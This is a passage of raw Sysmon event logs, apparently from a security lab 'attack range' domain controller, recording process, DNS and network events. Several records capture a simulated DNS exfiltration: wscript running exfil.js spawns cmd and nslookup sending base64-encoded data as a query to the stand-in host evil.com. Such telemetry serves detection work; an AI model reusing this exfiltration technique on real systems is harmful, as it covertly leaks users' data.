154100x8000000000000000201578Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.680{2E1864BB-17C3-629A-E840-000000005F02}5624C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17C3-629A-E640-000000005F02}3636C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlckgap.tmp 2>&1 10341000x8000000000000000201577Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.655{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17C3-629A-E740-000000005F02}6556C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201576Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.655{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17C3-629A-E740-000000005F02}6556C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201575Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.655{2E1864BB-17C3-629A-E740-000000005F02}65567920C:\Windows\system32\conhost.exe{2E1864BB-17C3-629A-E640-000000005F02}3636C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201574Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.639{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17C3-629A-E740-000000005F02}6556C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000201573Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.623{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201572Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.623{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201571Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.623{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201570Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.623{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201569Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.623{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17C3-629A-E640-000000005F02}3636C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000201568Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.623{2E1864BB-17A1-629A-783D-000000005F02}55521152C:\Windows\System32\WScript.exe{2E1864BB-17C3-629A-E640-000000005F02}3636C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000201567Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.633{2E1864BB-17C3-629A-E640-000000005F02}3636C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlckgap.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000201566Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.623{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlsiyhkf.tmpMD5=EE0F2C575C28024B257C8FA561A930FF,SHA256=609D891407BB69D11081AC946B86D51A56F6BAC0645721CD4B5620AA4DCA480C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000201565Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.909{00000000-0000-0000-0000-000000000000}5792<unknown process>-udpfalsefalse127.0.0.1-52827-false127.0.0.1-53domain 354300x8000000000000000201564Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.909{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52827- 354300x8000000000000000201563Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.909{00000000-0000-0000-0000-000000000000}5792<unknown process>-udptruefalse127.0.0.1-52827-false127.0.0.1-53domain 354300x8000000000000000201562Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.908{00000000-0000-0000-0000-000000000000}5792<unknown process>-udpfalsefalse127.0.0.1-52826-false127.0.0.1-53domain 354300x8000000000000000201561Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.908{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52826- 354300x8000000000000000201560Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.908{00000000-0000-0000-0000-000000000000}5792<unknown process>-udptruefalse127.0.0.1-52826-false127.0.0.1-53domain 354300x8000000000000000201559Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.780{00000000-0000-0000-0000-000000000000}7512<unknown process>-udpfalsefalse127.0.0.1-52825-false127.0.0.1-53domain 354300x8000000000000000201558Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.780{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52825- 354300x8000000000000000201557Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.780{00000000-0000-0000-0000-000000000000}7512<unknown process>-udptruefalse127.0.0.1-52825-false127.0.0.1-53domain 354300x8000000000000000201556Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.780{00000000-0000-0000-0000-000000000000}7512<unknown process>-udpfalsefalse127.0.0.1-52824-false127.0.0.1-53domain 354300x8000000000000000201555Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.780{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52824- 354300x8000000000000000201554Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.780{00000000-0000-0000-0000-000000000000}7512<unknown process>-udptruefalse127.0.0.1-52824-false127.0.0.1-53domain 354300x8000000000000000201553Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.779{00000000-0000-0000-0000-000000000000}7512<unknown process>-udpfalsefalse127.0.0.1-52823-false127.0.0.1-53domain 354300x8000000000000000201552Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.779{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52823- 354300x8000000000000000201551Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.779{00000000-0000-0000-0000-000000000000}7512<unknown process>-udptruefalse127.0.0.1-52823-false127.0.0.1-53domain 354300x8000000000000000201550Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.724{2E1864BB-E1C6-6299-D800-000000005F02}3988C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local56352-false10.0.1.12-8000- 354300x8000000000000000201549Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.642{00000000-0000-0000-0000-000000000000}660<unknown process>-udpfalsefalse127.0.0.1-52822-false127.0.0.1-53domain 354300x8000000000000000201548Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.641{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52822- 354300x8000000000000000201547Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.641{00000000-0000-0000-0000-000000000000}660<unknown process>-udptruefalse127.0.0.1-52822-false127.0.0.1-53domain 354300x8000000000000000201546Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.539{00000000-0000-0000-0000-000000000000}7984<unknown process>-udpfalsefalse127.0.0.1-52821-false127.0.0.1-53domain 354300x8000000000000000201545Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.539{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52821- 354300x8000000000000000201544Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.539{00000000-0000-0000-0000-000000000000}7984<unknown process>-udptruefalse127.0.0.1-52821-false127.0.0.1-53domain 354300x8000000000000000201543Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.539{00000000-0000-0000-0000-000000000000}7984<unknown process>-udpfalsefalse127.0.0.1-52820-false127.0.0.1-53domain 354300x8000000000000000201542Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.539{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52820- 354300x8000000000000000201541Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.539{00000000-0000-0000-0000-000000000000}7984<unknown process>-udpfalsefalse127.0.0.1-52819-false127.0.0.1-53domain 354300x8000000000000000201540Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.538{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52819- 354300x8000000000000000201539Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.538{00000000-0000-0000-0000-000000000000}7984<unknown process>-udptruefalse127.0.0.1-52819-false127.0.0.1-53domain 354300x8000000000000000201538Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.453{00000000-0000-0000-0000-000000000000}7488<unknown process>-udpfalsefalse127.0.0.1-52818-false127.0.0.1-53domain 354300x8000000000000000201537Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.453{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52818- 354300x8000000000000000201536Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.453{00000000-0000-0000-0000-000000000000}7488<unknown process>-udptruefalse127.0.0.1-52818-false127.0.0.1-53domain 354300x8000000000000000201535Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.453{00000000-0000-0000-0000-000000000000}7488<unknown process>-udpfalsefalse127.0.0.1-52817-false127.0.0.1-53domain 354300x8000000000000000201534Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.453{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52817- 354300x8000000000000000201533Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.453{00000000-0000-0000-0000-000000000000}7488<unknown process>-udptruefalse127.0.0.1-52817-false127.0.0.1-53domain 10341000x8000000000000000201532Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.586{2E1864BB-17C3-629A-E440-000000005F02}80127520C:\Windows\system32\conhost.exe{2E1864BB-17C3-629A-E540-000000005F02}2068C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000201531Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.453{00000000-0000-0000-0000-000000000000}7488<unknown process>-udpfalsefalse127.0.0.1-52816-false127.0.0.1-53domain 354300x8000000000000000201530Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.453{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52816- 354300x8000000000000000201529Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.377{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52815- 354300x8000000000000000201528Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.377{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52814- 354300x8000000000000000201527Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.376{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52813- 354300x8000000000000000201526Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.303{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52812- 354300x8000000000000000201525Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.303{00000000-0000-0000-0000-000000000000}6712<unknown process>-udptruefalse127.0.0.1-52812-false127.0.0.1-53domain 354300x8000000000000000201524Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.303{00000000-0000-0000-0000-000000000000}6712<unknown process>-udpfalsefalse127.0.0.1-52811-false127.0.0.1-53domain 354300x8000000000000000201523Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.303{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52811- 354300x8000000000000000201522Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.303{00000000-0000-0000-0000-000000000000}6712<unknown process>-udptruefalse127.0.0.1-52811-false127.0.0.1-53domain 354300x8000000000000000201521Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.303{00000000-0000-0000-0000-000000000000}6712<unknown process>-udpfalsefalse127.0.0.1-52810-false127.0.0.1-53domain 354300x8000000000000000201520Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.302{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52810- 354300x8000000000000000201519Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.221{00000000-0000-0000-0000-000000000000}4908<unknown process>-udpfalsefalse127.0.0.1-52809-false127.0.0.1-53domain 10341000x8000000000000000201518Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.586{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000201517Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.221{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52809- 354300x8000000000000000201516Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.220{00000000-0000-0000-0000-000000000000}4908<unknown process>-udptruefalse127.0.0.1-52809-false127.0.0.1-53domain 10341000x8000000000000000201515Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.586{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201514Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.586{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201513Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 